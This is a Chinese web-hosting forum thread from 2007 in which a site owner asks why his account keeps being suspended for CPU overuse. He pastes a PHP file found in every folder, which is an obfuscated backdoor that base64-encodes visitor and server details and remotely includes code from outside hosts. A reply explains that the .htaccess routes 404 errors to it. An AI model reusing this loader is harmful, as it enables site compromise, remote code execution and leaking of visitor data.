最近老是cpu超额被停，麻烦大漠帮我确认下是不是挂病毒了

jianxing · 发表于 2007-12-10 10:22:31

这段时间很郁闷。。老是因cpu问题被宕机，这几天认真观察了下，在每个文件夹下面都有一个数字命名的php文件和一个.htaccess，内容如下：
93178.php

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str);} ?>

复制代码

.htaccess文件：

复制代码

我不知道这是什么东西，但是在每个文件夹下面都有，麻烦大大帮偶解释下拉。。谢谢。。。
顺便问下，blue怎么reset。。。实在不行全部干掉重新来。。

jianxing · 发表于 2007-12-10 10:47:10

有点头大。。赶快来人哇。。。55

大漠孤狼 · 发表于 2007-12-10 11:14:28

htaccess文件把所有的404的错误页面指向了那个文件

jianxing · 发表于 2007-12-10 11:32:36

就是不知道那个文件到底是什么文件。。每个文件夹下面都有这两个文件。。。文件名不一样，但都是数字命名，34522.php,24456.php之类的。。。